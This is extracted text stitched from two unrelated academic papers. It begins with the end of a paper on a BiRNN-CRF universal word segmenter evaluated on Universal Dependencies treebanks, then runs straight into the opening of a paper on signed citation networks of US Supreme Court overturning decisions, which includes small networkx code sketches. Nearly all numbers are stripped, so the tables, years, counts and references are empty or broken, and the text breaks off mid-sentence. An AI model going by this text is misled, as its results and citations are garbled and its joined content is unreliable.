spanish-pud . . swedish . . swedish-lines . . swedish-pud . . turkish . . turkish-pud . . ukrainian . . urdu . . uyghur . . vietnamese . . average . . table : evaluation results on the ud test sets in f -scores. the datasets are represented in the correspond- ing treebank codes. pud suffix indicates the parallel test data. two shades of green/red are used for better visualisation, with brighter colours for larger differences. green represents that our system is better than udpipe and red is used otherwise. bt bt+crf ft ft+crf chinese . . . . japanese . . . . vietnamese . . . . arabic . . . . hebrew . . . . table : comparison between the binary tags (bt) and the fine-grained tags (ft) as well as the effec- tiveness of the crf interface on the development sets. tags include two basic tags b, i plus the correspond- ing tags b, i for non-segmental multiword tokens. white space is marked as i instead of x. the con- catenated -grams are not applied. in general, the experimental results confirm that the fine-grained tags are more beneficial except for vietnamese. the fine-grained tagset contains more structured posi- tional information that can be exploited by the word segmentation model. additionally, the crf in- terface leads to notable improvements, especially arabic french german hebrew udpipe . . . . our model . . . . table : percentages of the correctly processed multiword tokens on the development sets. for arabic and hebrew. the combination of the fine-grained tags with the crf interface achieves substantial improvements over the basic binary tag model that is analogous to udpipe. for arabic and hebrew, apart from greatly bene- fiting from the fine-grained tagset and the crf inter- face, our model is better at handling non-segmental multiword tokens (table ). the attention-based encoder-decoder as the transducer is much more powerful in processing the non-segmental multi- word tokens that are not covered by the dictionary than the suffix rules for analysing multiword tokens in udpipe. 
udpipe obtains higher scores on a few datasets. our model overfits the small training data of uyghur segmentation udpipe parser dozat et al. ( ) accuracy uas las uas las udpipe this paper udpipe this paper udpipe this paper udpipe this paper udpipe this paper arabic . . . . . . . . . . chinese . . . . . . . . . . hebrew . . . . . . . . . . japanese . . . . . . . . . . vietnamese . . . . . . . . . . table : extrinsic evaluations with dependency parsing on the test sets. the parsing accuracies are reported in unlabelled attachment score (uas) and labelled attachment score (las). space nltk sample transfer buryat . . . . (russian) kurmanji . . . . (spanish) north sami . . . . (german) upper sorbian . . . . (spanish) table : evaluation on the surprise languages. as it yields . f -score on the development set. for a few parallel test sets, there are punctuation marks not found in the training data that cannot be correctly analysed by our system as it is fully data- driven without any heuristic rules for unknown char- acters. the evaluation results on the surprise languages are presented in table . in addition to the seg- mentation models proposed in this paper, we present the evaluation scores of a space-based tokeniser as well as the nltk model for english. as shown by the previous learning curve experiments in sec- tion . , very high accuracies can be obtained on the space-delimited languages with only small amounts of training data. however, in case of extreme data sparseness (less than training sentences), such as for the four surprise languages in table and kazakh in table , the segmentation results are dras- tically lower even though the surprise languages are all space-delimited. for the surprise languages, we find that applying segmentation models trained on a different language with more training data yields better results than re- lying on the small annotated samples of the target language. considering that the segmentation model is fully character-based, we simply select the model of the language that shares the most characters with the surprise language as its segmentation model. no annotated data of the surprise language are used for model selection. as shown in table , the transfer approach achieves comparable segmentation accu- racies to nltk. for space-delimited languages with insufficient training data, it may be beneficial to em- ploy a well-designed rule-based word segmenter as nltk occasionally outperforms the data-driven ap- proach. as a form of extrinsic evaluation, we test the seg- menter in a dependency parsing setup on the datasets where we obtained substantial improvements over udpipe. we present results for the transition-based parsing model in udpipe . and for the graph- based parser by dozat et al. ( ). the experimen- tal results are shown in table . we can see that word segmentation accuracy has a great impact on parsing accuracy as the segmentation errors propa- gate. having a more accurate word segmentation model is very beneficial for achieving higher pars- ing accuracy. related work the birnn-crf model is proposed by huang et al. ( ) and has been applied to a number of se- quence labelling tasks, such as part-of-speech tag- ging, chunking and named entity recognition. our universal word segmenter is a major exten- sion of the joint word segmentation and pos tagging system described by shao et al. ( ). the origi- nal model is specifically developed for chinese and only applicable to chinese and japanese. 
apart from being language-independent, the proposed model in this paper employs an extended tagset and a comple- mentary sequence transduction component to fully process non-segmental multiword tokens that are present in a substantial amount of languages, such as arabic and hebrew in particular. it is a gener- alised segmentation and transduction framework. our universal model is compared with the this paper shao che björkelund chinese . . . . japanese . . . . arabic . – . . hebrew . – . . table : comparison between the universal model and the language-specific models. language-specific model of shao et al. ( ) in ta- ble . with pretrained character embeddings, en- semble decoding and joint pos tags prediction as introduced in shao et al. ( ), considerable im- provements over the universal model presented in this paper can be obtained. however, the joint pos tagging system is difficult to generalise as single characters in space-delimited languages are usually not informative for pos tagging. additionally, com- pared to chinese, sentences in space-delimited lan- guages have a much greater number of characters on average. combining the pos tags with segmenta- tion tags drastically enlarges the search space and therefore the model becomes extremely inefficient both for training and tagging. the joint pos tag- ging model is nonetheless applicable to japanese and vietnamese. monroe et al. ( ) present a data-driven word segmentation system for arabic based on a sequence labelling framework. an extended tagset is designed for arabic-specific orthographic rules and applied together with hand-crafted features in a crf frame- work. it obtains . f -score on newswire ara- bic treebank, . on broadcast news treebank, and . on the egyptian arabic dataset. for he- brew, goldberg and elhadad ( ) perform word segmentation jointly with syntactic disambiguation using lattice parsing. each lattice arc corresponds to a word and its corresponding pos tag, and a path through the lattice corresponds to a specific word segmentation and pos tagging of the sentence. the proposed model is evaluated on the hebrew tree- bank (guthmann et al., ). the joint word seg- mentation and parsing f -score ( . ) is reported and compared against the parsing score ( . ) with gold word segmentation. the evaluation scores re- ldc t , ldc t , ldc t ldc t ldc e , , , , , , ldc e , ported in both monroe et al. ( ) and goldberg and elhadad ( ) are not directly comparable to the evaluation scores on arabic and hebrew in this paper, as they are obtained on different datasets. for universal word segmentation, apart from ud- pipe described in section . , there are several systems that are developed for specific language groups. che et al. ( ) build a similar bi-lstm word segmentation model targeting languages with- out space delimiters like chinese and japanese. the proposed model incorporates rich statistics-based features gathered from large-scale unlabelled data, such as character unigram embeddings, character bigram embeddings and the point-wise mutual in- formation of adjacent characters. björkelund et al. ( ) use a crf-based tagger for multiword token rich languages like arabic and hebrew. a predicted levenshtein edit script is employed to transform the multiword tokens into their components. the evalu- ation scores on a selected set of languages reported in che et al. ( ) and björkelund et al. ( ) are included in table as well. more et al. 
( ) adapt existing morphologi- cal analysers for arabic, hebrew and turkish and present ambiguous word segmentation possibilities for these languages in a lattice format (conll- ul) that is compatible with ud. the conll-ul datasets can be applied as external resources for pro- cessing non-segmental multiword tokens. conclusion we propose a sequence tagging model and apply it to universal word segmentation. birnn-crf is adopted as the fundamental segmentation frame- work that is complemented by an attention-based sequence-to-sequence transducer for non-segmental multiword tokens. we propose six typological fac- tors to characterise the difficulty of word segmen- tation cross different languages. the experimental results show that segmentation accuracy is primarily correlated with segmentation frequency as well as the set of non-segmental multiword tokens. using whitespace as delimiters is crucial to word segmen- tation, even if the correlation between orthographic tokens and words is not perfect. for space-delimited conll-ul is not evaluated in our experiments as it is very recent work. languages, very high accuracy can be obtained even with relatively small training sets, while more train- ing data is required for high segmentation accuracy for languages without spaces. based on the analy- sis, we apply a minimal number of language-specific settings to substantially improve the segmentation accuracy for languages that are fundamentally more difficult to process. the segmenter is extensively evaluated on the ud datasets in various languages and compared with udpipe. apart from obtaining nearly perfect segmentation on most of the space-delimited lan- guages, our system achieves high accuracies on lan- guages without space delimiters such as chinese and japanese as well as semitic languages with abundant multiword tokens like arabic and hebrew. acknowledgments we acknowledge the computational resources pro- vided by csc in helsinki and sigma in oslo through neic-nlpl (www.nlpl.eu). this work is supported by the chinese scholarship council (csc) (no. ). we would like to thank the tacl editors and reviewers for their valuable feedback. references martı́n abadi, paul barham, jianmin chen, zhifeng chen, andy davis, jeffrey dean, matthieu devin, sanjay ghemawat, geoffrey irving, michael isard, et al. . tensorflow: a system for large-scale machine learning. in proceedings of the th usenix symposium on operating systems design and imple- mentation (osdi), pages – . hervé abdi and lynne j williams. . principal component analysis. wiley interdisciplinary reviews: computational statistics, ( ): – . dzmitry bahdanau, kyunghyun cho, and yoshua ben- gio. . neural machine translation by jointly learning to align and translate. in international con- ference on learning representations. anders björkelund, agnieszka falenska, xiang yu, and jonas kuhn. . ims at the conll ud shared task: crfs and perceptrons meet neural net- works. in proceedings of the conll shared task: multilingual parsing from raw text to universal dependencies, pages – . wanxiang che, jiang guo, yuxuan wang, bo zheng, huaipeng zhao, yang liu, dechuan teng, and ting liu. . the hit-scir system for end-to-end pars- ing of universal dependencies. in proceedings of the conll shared task: multilingual parsing from raw text to universal dependencies, pages – . xinchi chen, xipeng qiu, chenxi zhu, pengfei liu, and xuanjing huang. . long short-term mem- ory neural networks for chinese word segmentation. 
in conference on empirical methods in natural lan- guage processing, pages – . kyunghyun cho, bart van merriënboer, dzmitry bah- danau, and yoshua bengio. . on the properties of neural machine translation: encoder-decoder ap- proaches. arxiv preprint arxiv: . . miryam de lhoneux, yan shao, ali basirat, eliyahu kiperwasser, sara stymne, yoav goldberg, and joakim nivre. . from raw text to universal de- pendencies – look, no tags! in proceedings of the conll shared task: multilingual parsing from raw text to universal dependencies., pages – . timothy dozat, peng qi, and christopher d. man- ning. . stanford’s graph-based neural depen- dency parser at the conll shared task. in pro- ceedings of the conll shared task: multilin- gual parsing from raw text to universal dependen- cies, pages – , vancouver, canada, august. asso- ciation for computational linguistics. john duchi, elad hazan, and yoram singer. . adaptive subgradient methods for online learning and stochastic optimization. journal of machine learning research, (jul): – . xavier glorot and yoshua bengio. . understanding the difficulty of training deep feedforward neural net- works. in international conference on artificial intel- ligence and statistics, pages – . yoav goldberg and michael elhadad. . word seg- mentation, unknown-word resolution, and morpholog- ical agreement in a hebrew parsing system. computa- tional linguistics, ( ): – , march. noemie guthmann, yuval krymolowski, adi milea, and yoad winter. . automatic annotation of mor- phosyntactic dependencies in a modern hebrew. in proceedings of the st workshop on treebanks and linguistic theories, pages – . sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – . zhiheng huang, wei xu, and kai yu. . bidi- rectional lstm-crf models for sequence tagging. arxiv preprint arxiv: . . peter j huber. . robust estimation of a location pa- rameter. the annals of mathematical statistics, pages – . alon itai and shuly wintner. . language resources for hebrew. language resources and evaluation, ( ): – . john d. lafferty, andrew mccallum, and fernando c. n. pereira. . conditional random fields: probabilis- tic models for segmenting and labeling sequence data. in proceedings of the eighteenth international con- ference on machine learning, icml ’ , pages – . haizhou li, a kumaran, vladimir pervouchine, and min zhang. . report of news machine translit- eration shared task. in proceedings of the named entities workshop: shared task on transliteration, pages – . edward loper and steven bird. . nltk: the nat- ural language toolkit. in proceedings of the acl- workshop on effective tools and methodologies for teaching natural language processing and computa- tional linguistics-volume , pages – . association for computational linguistics. will monroe, spence green, and christopher d man- ning. . word segmentation of informal arabic with domain adaptation. in proceedings of the nd annual meeting of the association for computational linguistics (volume : short papers), volume , pages – . amir more, özlem çetinoğlu, çağrı çöltekin, nizar habash, benoı̂t sagot, djamé seddah, dima taji, and reut tsarfaty. . conll-ul: universal morpho- logical lattices for universal dependency parsing. in proceedings of the eleventh international conference on language resources and evaluation. joakim nivre, marie-catherine de marneffe, filip ginter, yoav goldberg, jan hajic, christopher d. 
manning, ryan mcdonald, slav petrov, sampo pyysalo, na- talia silveira, reut tsarfaty, and daniel zeman. . universal dependencies v : a multilingual treebank collection. in proceedings of the th international conference on language resources and evaluation, pages – . david palmer and john burger. . chinese word seg- mentation and information retrieval. in aaai spring symposium on cross-language text and speech re- trieval, pages – . teemu ruokolainen, oskar kohonen, sami virpioja, and mikko kurimo. . supervised morphological seg- mentation in a low-resource learning setting using con- ditional random fields. in proceedings of the sev- enteenth conference on computational natural lan- guage learning, pages – , sofia, bulgaria. asso- ciation for computational linguistics. ivan a sag, timothy baldwin, francis bond, ann copes- take, and dan flickinger. . multiword expres- sions: a pain in the neck for nlp. in international conference on intelligent text processing and com- putational linguistics, pages – . springer. yan shao, christian hardmeier, jörg tiedemann, and joakim nivre. . character-based joint segmenta- tion and pos tagging for chinese using bidirectional rnn-crf. in proceedings the th international joint conference on natural language processing, pages – . nitish srivastava, geoffrey e hinton, alex krizhevsky, ilya sutskever, and ruslan salakhutdinov. . dropout: a simple way to prevent neural networks from overfitting. journal of machine learning re- search, ( ): – . milan straka and jana straková. . tokenizing, pos tagging, lemmatizing and parsing ud . with ud- pipe. in proceedings of the conll shared task: multilingual parsing from raw text to universal de- pendencies, pages – . nianwen xue. . chinese word segmentation as character tagging. computational linguistics and chinese language processing, pages – . daniel zeman, martin popel, milan straka, jan ha- jic, joakim nivre, filip ginter, juhani luotolahti, sampo pyysalo, slav petrov, martin potthast, fran- cis tyers, elena badmaeva, memduh gokirmak, anna nedoluzhko, silvie cinkova, jan hajic jr., jaroslava hlavacova, václava kettnerová, zdenka uresova, jenna kanerva, stina ojala, anna missilä, christopher d. manning, sebastian schuster, siva reddy, dima taji, nizar habash, herman leung, marie-catherine de marneffe, manuela sanguinetti, maria simi, hiroshi kanayama, valeria depaiva, kira droganova, héctor martı́nez alonso, çağr çöltekin, umut sulubacak, hans uszkoreit, vivien macketanz, aljoscha burchardt, kim harris, katrin marheinecke, georg rehm, tolga kayadelen, mohammed attia, ali elkahky, zhuoran yu, emily pitler, saran lertpradit, michael mandl, jesse kirchner, hector fernandez al- calde, jana strnadová, esha banerjee, ruli manurung, antonio stella, atsuko shimada, sookyoung kwak, gustavo mendonca, tatiana lando, rattima nitisaroj, and josie li. . conll shared task: multi- lingual parsing from raw text to universal dependen- cies. in proceedings of the conll shared task: multilingual parsing from raw text to universal de- pendencies, pages – . hai zhao, chang-ning huang, mu li, and bao-liang lu. . effective tag set selection in chinese word segmentation via conditional random field modeling. in proceedings of the th pacific asia conference on language, information and computation, pages – . youguang zhou. . the family of chinese character- type scripts. sino-platonic papers, . connections © authors. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /). 
issue | vol. article | doi: . /connections- - signed networks for the us supreme court overturning its prior decisions the supreme court is placed at the top of the us judicial system. this court can hear all civil cases between states and cases between a state and all federal institutions. also, it can review all decisions made by lower courts. as such, it is one of the three fundamental branches of the us government. its de- cisions can have far reaching effects on all areas of life in the usa. there is a large legal literature on the workings of the supreme court. in this context, fowler and jeon ( ) created a network file with all supreme court decisions for the pe- riod – and their citations to earlier decisions made by this court. the number of decisions in this network is , . producing these data was an in- valuable service for scholars studying this court and for network analysts. it facilitated the study of the us supreme court in terms of network analytic ideas. the network ties are citations from later decisions to earlier decisions taken from the majority opinions . there are multiple ways of studying this citation network. fowler and jeon used it to study the evolution of stare decesis, latin for “to stand by things decided.” they showed a steady evolution of this fundamental legal concept through the nineteenth and the early twenti- eth centuries. they documented a departure from this pattern by the warren court ( – ). by using the concept of authorities (kleinberg, ), they con- structed measures of the importance of decisions and tracked changes in their importance over time. even patrick doreian , and andrej mrvar department of sociology, university of pittsburgh, pittsburgh, usa. faculty of social sciences, university of ljubljana, ljubljana, slovenia. e-mails: pitpat@pitt.edu; andrej. mrvar@fdv.uni-lj.si. this paper was edited by eric quintane. received for publication april , . abstract this paper introduces the idea of studying the decision citation network of the us supreme court in a new fashion by focusing on this court’s overturning of some of its prior decisions. two depar- tures from current practices were developed. one was to consider the phenomenon of overturning in a broader network context. the second was to treat the citations between overturning decisions and the overturned decisions as negative ties. this led to the creation of multiple signed citation networks. these networks were studied to get a better understanding of the operation of this court. the results show that, frequently, when decisions are overturned, this is not done in a logically consistent fashion. a research agenda is proposed regarding a reexamination of stare decesis, thought to be a bedrock of the us legal system, and calling it into question as a genuine operating legal principle. keywords supreme court, overturning decisions, signed networks, citation network. very frequently, multiple opinions are written for each decision. one is the majority opinion which is written by one justice that other justices join. there can be concurring opinions which agree with the decision but use different ar- guments or rationales for supporting the decision that was made. there can be dissenting opinions written by justices who reject the decision. fowler and jeon ( ) used only the majority opinions in constructing the citation network as they are the dominant opinions for the decisions. as a result, the decision and the majority opinion are treated as being the same. 
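the importance measure mentioned above is kleinberg's notion of authorities. as a minimal sketch (not the fowler and jeon code), such scores can be computed on a citation network with the hits implementation in networkx; the edge-list file name and format here are assumptions for illustration only.

```python
import networkx as nx

def load_citation_network(edge_list_path):
    """Directed citation graph: an arc u -> v means decision u cites decision v."""
    g = nx.DiGraph()
    with open(edge_list_path, encoding="utf-8") as f:
        for line in f:
            parts = line.split()
            if len(parts) == 2:
                citing, cited = parts
                g.add_edge(citing, cited)
    return g

def top_authorities(g, k=10):
    """Kleinberg's HITS: decisions cited by many well-placed decisions get high authority."""
    _hubs, authorities = nx.hits(g, max_iter=1000, normalized=True)
    return sorted(authorities.items(), key=lambda kv: kv[1], reverse=True)[:k]

# hypothetical usage:
# g = load_citation_network("scotus_citations.tsv")
# for decision, score in top_authorities(g):
#     print(decision, round(score, 4))
```

restricting the graph to decisions up to a given year before computing the scores gives, in spirit, the over-time tracking of importance described above.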
signed networks for the supreme court citation network though they were attentive to some decisions over- turning earlier decisions, fowler and jeon treated the ties between overturning decisions and the decisions they overturned as positive citation ties. a different approach to studying this network was presented in batagelj et al. ( , chapter ). rather than use counts of citations to (or from) de- cisions, they opted for examining the extent to which earlier decisions were co-cited. the rationale for this approach was the intuition that earlier decisions being heavily co-cited together must have important fea- tures in common. using the islands technique (bat- agelj et al., , chapter ), they identified sets of decisions that were linked internally by much higher rates of being co-cited than for other decisions within the network. one concerned only native americans. many of the supreme court’s decisions led to heavy constraints on these peoples, especially restrictions of their legal autonomy. the “important feature” for the decisions in this island was the consideration of native americans. another island identified diverse groups of people and ideas targeted in the us court system following three acts passed by congress in wwi. the con- stitutional principles involved the first and fourteenth amendments as the important features holding this set of decisions together. the targeted groups were in sequence: socialists and communists (in the first red scare in the s); labor unions; black organi- zations, especially the naacp; jehovah’s witnesses; communists and socialists again (in the second red scare from the late s through the s); je- hovah’s witnesses again; women (regarding limiting their access to birth control and, later, abortion); ob- scenity; the free press; and restrictions of the free- dom of speech. both of these studies provided useful insights re- garding the decisions of the supreme court and the impacts these decisions had on the usa, its institu- tions and its population. the key new idea introduced here is to treat the supreme court citation network as being signed when overturning of prior decisions occurs. the rest of the paper is organized as follows. sec- tion “treating the supreme court citation network as signed” provides the rationale of defining negative ties in the supreme court citation network and treating it being signed. section “consistencies and inconsistencies in triples of decisions” introduces the idea of there being inconsistencies in signed triples of decisions when overturning is involved. section “the supreme court overturning network data” provides the definition of multiple signed networks that result along with the rationale for studying them in detail. we focus on the decisions linked by negative ties in section “networks of decisions linked only by neg- ative citation ties.” the mobilization of inconsistency ideas follows in section “mobilizing ideas regarding inconsistencies when decisions are overturned” and forms the core of the paper . section “empirical ex- amples of the inconsistent triple types” provides fur- ther examples of inconsistent triples. our conclusions and a proposed research agenda are presented in section “conclusions, a research agenda and a speculation about stare decesis.” treating the supreme court citation network as signed here, we introduce a different approach to these data by focusing on this citation network as one that is signed. 
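before turning to the signed treatment, the co-citation measure used by batagelj et al. ( ) can be sketched in a few lines. this is an illustration only, with hypothetical case identifiers; the islands extraction itself is done in pajek and is not reproduced here.

```python
from collections import Counter
from itertools import combinations

def co_citation_counts(citations):
    """
    citations: dict mapping each citing decision to the set of earlier decisions
    cited in its majority opinion. Returns a Counter over unordered pairs of
    earlier decisions, counting how often they are cited together.
    """
    pair_counts = Counter()
    for cited_set in citations.values():
        for a, b in combinations(sorted(cited_set), 2):
            pair_counts[(a, b)] += 1
    return pair_counts

# toy usage (hypothetical identifiers):
citations = {
    "case_A": {"case_X", "case_Y"},
    "case_B": {"case_X", "case_Y", "case_Z"},
    "case_C": {"case_X", "case_Z"},
}
print(co_citation_counts(citations).most_common(2))
```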
as noted by fowler and jeon ( ), a large majority of supreme court decisions cite earlier deci- sions . within their research framework, all citations were positive ties. however, there is no sensible basis for treating any overturning “citation” tie as a positive citation to the overturned decision. when an earlier decision is overturned, the overturning decision re- pudiates all or part of the overturned decision. the ties between them must be considered as negative. this implies the construction of one or more signed citation networks for studying supreme court deci- sions. by a wide margin, most ( %) earlier decisions were overturned completely. the designation of a de- cision as being overturned “in part” was made by the government printing office ( ). decisions, most often, have multiple components and rationales for the decisions that were made. if only some of them are negated by a subsequent decision, this was listed as a decision that was overturned in part. to our knowledge, such an approach has not been adopted hitherto when examining the supreme court citation network. this creates an opportunity two were the selective service act and espionage act that were passed in . the sedition act was passed in to extend the espionage act to broaden the number of offenses meriting punishments for interfering with the operation of the us government. most of the analyses performed for our results used pajek (batagelj and mrvar, ). there are decisions that cite no earlier decisions and are not cited by later decisions. as such, they are isolates in the citation network and were not considered further. connections for considering some additional questions about the operation of this court. the resulting signed networks are described in more detail in section “the supreme court overturning network data.” these questions include: (a) what is the nature and structure of this signed network? (b) how much overturning of prior decisions exists? (c) why do prior decisions get overturned? and (d) what can be gained by looking at networks of supreme court decisions linked by negative ties? as noted above, fowler and jeon ( ) consid- ered stare decesis to document its existence and importance. we look at this idea in a different way by viewing it with greater skepticism even though it is thought to be one of the bedrocks of the us judicial system. this is done using the negative ties due to some decisions overturning prior decisions which are instances of stare decesis being explicitly rejected. our hope is that this line of analysis will add to the work of spaeth and segal ( ) who, using a clever research design, provided convincing evidence that justices are far more like to vote their preferences than they are to follow stare decesis. most discussions of the supreme court overturn- ing prior decisions focus primarily on single pairs of de- cisions. in considering such (overturning, overturned) pairs of decisions, the main features considered in these analyses include the substantive issues in- volved, the constitutional principles used to decide cases, and the written opinions of justices regarding prior relevant decisions. of course, these issues must be considered always in such analyses. but, while this is very useful for studying pairs of decisions, such a strategy has limitations by being a dyadic approach. as we show below, such (overturning, overturned) pairs of decisions are embedded in larger network structures, especially triples of decisions, in ways that show logical inconsistencies. 
it seems more fruitful to think in terms of networks of decisions involving cases when prior decisions are overturned. consistencies and inconsistencies in triples of decisions here, we focus primarily on the presence of incon- sistencies in triples of decisions when there are neg- ative ties between some pairs of decisions. this is illustrated in figure with three triples of hypothetical supreme court decisions where consistency appears to be lacking. in the left-side triple, decision cites decisions and positively even though decision overturns decision . in the middle triple, decision cites decision positively while decision cites deci- sion positively. yet decision overturns decision . in the rightmost triple, decision overturns decision and cites positively decision . but decision also cites decision positively. all these triples are incon- sistent. we provide real empirical examples of each of these inconsistent triple types in section “mobiliz- ing ideas regarding inconsistencies when decisions are overturned.” ideally, none of these inconsistent triples would exist in a signed supreme court citation network if the arguments and ideas expressed in these decisions were thought through in a thoroughly systematic fashion. but, as we show below, such inconsistencies do exist, raising two obvious further questions. first, how many such triples are there? second, does this matter? the answers are that many do exist and, yes, they do matter. however, there is a complication that arises here. consider the rightmost triple in figure . if decision overturns a part of decision that is irrelevant for decision , that decision cites decision and that figure : three inconsistent triples of hypothetical decisions each involving one overturning link. signed networks for the supreme court citation network decision does not overturn decision , then there is no inconsistency. this implies a need to distin- guish between completely overturned decisions and decisions that are overturned in part. we tackle this in two ways. one is to ignore the distinction and treat- ing all overturning pairs. this has a clear problem in that the number of instances of inconsistencies will be overstated. the second is to confine attention solely to those decisions that are overturned com- pletely. this also has a limitation in that the number of instances of inconsistencies will be understated. continuing the example, if decision overturns a part of decision that is relevant for decision , then there is an inconsistency. an inherent task for a com- plete analysis is the necessity to look at all (overturn- ing, overturned) pairs of decision to determine what exactly was overturned when a decision is overturned in part. this will be a daunting task but is not needed here given the results shown below. the supreme court overturning network data the primary data source for the signed network we consider herein is the government printing office ( ) document: supreme court decisions over- ruled by subsequent decision. these data were sup- plemented by information obtained from multiple other sources including: epstein et al. ( ), root ( ), vile ( ), powe ( ), gerhardt ( ), hall ( ), spriggs and hansford ( ), brenner and spaeth ( ) and eskridge ( ) . this entailed identify- ing the overturned decisions in the larger network of fowler and jeon and marking the overturning links as negative citation ties. multiple signed networks were constructed. 
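a minimal sketch of how such signed networks can be assembled is given below. it assumes two prepared inputs, a list of (citing, cited) pairs from the fowler and jeon data and a list of (overturning, overturned) pairs compiled from the sources described below; the use of networkx and the attribute names are illustrative assumptions, not the pajek workflow actually used for the analyses.

```python
import networkx as nx

def build_signed_citation_network(citation_edges, overturning_pairs):
    """
    citation_edges: iterable of (citing, cited) decision pairs.
    overturning_pairs: iterable of (overturning, overturned) decision pairs.
    Ordinary citations get sign = +1; overturning ties get sign = -1,
    overriding the positive citation if one was present.
    """
    g = nx.DiGraph()
    for citing, cited in citation_edges:
        g.add_edge(citing, cited, sign=+1)
    for overturning, overturned in overturning_pairs:
        g.add_edge(overturning, overturned, sign=-1)
    return g

def negative_only_subnetwork(g):
    """The network of decisions linked only by negative (overturning) ties."""
    neg_edges = [(u, v) for u, v, d in g.edges(data=True) if d["sign"] < 0]
    return g.edge_subgraph(neg_edges).copy()
```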
for the period we consider ( – ) , there were decisions involved in the resulting networks with later decisions overturning prior decisions. there were instances of such (overturning, overturned) pairs of decisions. below, we show that some decisions overturned more than one decision. such a phenom- enon would be missed in a strict dyadic approach to overturning decisions. this has relevance as overturn- ing one decision can imply that other related earlier decisions may also suffer the same fate. examples of this happening are provided in section “networks of decisions linked only by negative citation ties”. some decisions were overturned multiple times. it would seem that if a prior decision is overturned completely, this ought to be sufficient to invalidate the overturned decision as precedent. seemingly, this is not the case. when a decision is overturned, there are rationales provided for doing so. however, there can be different rationales for overturning an earlier decision. in the view of later courts overturning prior decisions, it appears that they think they have a more compelling rationale for overturning an earlier decision. such instances strongly reinforce our view that con- sidering networks of decisions instead of separate dyads is useful. multiple signed networks can be constructed. one is the network of decisions linked by only the negative ties. this is illustrated in figure and dis- cussed further in section “networks of decisions linked only by negative citation ties.” there is also the adaptation of the fowler and jeon ( ) network where the overturning links defined as negative rather than positive were changed. for our major analyses, we labeled this as a “starting” network. we used this network to create another signed network by embed- ded it into the network of all relevant decisions and the positive ties linking them in the fowler and jeon network. the relevance for this inclusion was that the additional decisions had to meet two critical criteria. one was to include all earlier decisions that were cited (positively) by the decisions in the starting network. the second was to include all of the later decisions citing all of the decisions in the so-called starting net- work. the resulting network had , decisions. it had , positive ties and negative ties. we first show the bigger picture regarding over- turning of prior decisions in figure . this is the first signed network as all the network ties in this figure are negative. it is ordered by time with the most recent courts being at the top of the figure and the earlier courts at the bottom . it shows two features regarding the supreme court. one is the levels of additional information, along with confirmations for deter- mining pairs of overturning and overturned decisions came from a variety of on-line sources. particularly useful ones were: https://supreme.justia.com/cases/federal/us; https:// law.resource.org/pub/us/case/reporter/us; http://caselaw. findlaw.com/us-supreme-court, https://www.law.cornell. edu/ (legal information institute); https://www.lexisnexis. com/en-us (lexis nexis); and https://en.wikipedia.org/wiki/. to consider a larger number of instances of this court overturning prior decisions, we expanded the time range to , the end of the rehnquist court. a future project will include the roberts court that followed the rehnquist court. 
connections overturning between supreme courts, defined by their chief justices, where the arrows show the mag- nitudes of each court overturning decisions of earlier courts. the widths of these overturning links are far larger in recent years. the other feature is reflected in the sizes of the vertices showing the levels at which specific courts, as defined by their chief justices, overturn themselves. figure raises the issue of why the rates of over- turning prior decisions have increased over time. in large part, we think this may be due simply to the increasing number of prior decisions that could be considered as relevant and wrongly decided by earlier courts. however, we suspect that there may be an additional source for these increased levels of overturning prior decisions. when writing decisions, justices are free to cite any prior decisions made by earlier courts. more consequentially, perhaps, they are free to not cite earlier decisions which, while rel- evant, would not support the decision being made . there are few constraints regarding citation behavior beyond creating the need of crafting arguments and generating support for decisions being made. also, specific courts may have increased rates for overturning prior decisions if their broad ideological stances differed. the warren court is generally thought to have been “liberal.” indeed, fowler and jeon ( ) note that the warren court often overruled precedent. irons ( ) makes a compelling case that, over its long-term history, the supreme court was filled by insiders making decisions with negative impacts on outsiders, primarily minorities, women and the poor. put differently, irons emphasized the figure : levels of overturning decisions within and between courts defined by chief justices. one compelling example of this phenomenon came with the dred scott decision (scott v. sandford) written by chief justice taney in . according to irons ( , ), “he misread history, twisted legal precedent, and bent the constitution out of shape, all to achieve his predetermined goal of promoting the extension of slavery into the territo- ries” (the territories were not part of states at that time). as a part of doing this, he ignored at least prior decisions made by his own court. these omissions were pointed out by the two dissenting justices, mcclean and curtis, in their strong opinions. pun intended, there are precedents for ignoring precedent. signed networks for the supreme court citation network warren court’s expansive view of rights for all amer- icans. in contrast, the rehnquist, burger, and vinson courts have been regarded as “conservative” and more supportive of traditional values. yet, figure makes it clear that these conservative courts also overturned prior decisions at about the same rate as the warren court. with different judicial philosophies, there are in- centives for targeting earlier decisions that differ in this regard. it will be a monumental task to pursue this as supreme court decisions will have to be read closely, along with concurrences and dissents. that is reserved for another project. networks of decisions linked only by negative citation ties here, we consider the network having only the nega- tive overturning links between decisions regardless of the courts making them. it merits attention by having a set of weak components. their distribution in terms of size is: one having decisions; six with deci- sions; ten having decisions; with decisions; with decisions; and dyadic pairs. 
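the weak components of the negative-tie network can be extracted directly. a sketch, assuming the negative-only subnetwork built as in the earlier fragment:

```python
from collections import Counter
import networkx as nx

def weak_component_sizes(neg_graph):
    """Map component size -> number of weak components of that size."""
    return Counter(len(c) for c in nx.weakly_connected_components(neg_graph))

def largest_weak_components(neg_graph, k=3):
    """Return the k largest weak components as subgraphs, for closer substantive reading."""
    comps = sorted(nx.weakly_connected_components(neg_graph), key=len, reverse=True)
    return [neg_graph.subgraph(c).copy() for c in comps[:k]]

# hypothetical usage:
# print(weak_component_sizes(neg_graph))
# ten_vertex_component = largest_weak_components(neg_graph, k=1)[0]
```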
while all these components can be considered, we focused on some of the largest weak components. the primary concern for doing this was to understand the sub- stantive issues involved in these cases, the constitu- tional issues used to decide a case, and the courts involved in these decisions. this is fully consistent with a general research strategy that considers the contexts within which networks are established. the largest such weak component having ten decisions is shown in figure . the two overturning decisions both came from the warren court ( – ). the overturned de- cisions were made by the fuller ( – ), white ( – ), taft ( – ), hughes ( – ), stone ( – ), and warren courts. the primary substantive concern was the immunity provision (against self-incrimination) in conjunction with the ways the police obtained evidence. another substan- tive issue was the relative roles of the federal and state courts regarding the nature of evidence, a long-term thorny and contentious legal issue. the constitutional issues involved were the fourth amendment (regard- ing search and seizure) , the fifth amendment (re- garding self-incrimination and due process) , and the fourteenth amendment (protecting rights against state infringements and prohibiting states from inter- fering with privileges and immunities) . the warren court, after , took seriously the protections afforded to people, especially regard- ing due process (irons, ). this contrasted with the fifth amendment allows defendants not to provide testimony that would be incriminating. figure : the ten-vertex weak component of decisions linked by negative ties. note: the decisions are labeled by the years they were made, and the notation used by the supreme court to identify specific decisions. the fourth amendment states: 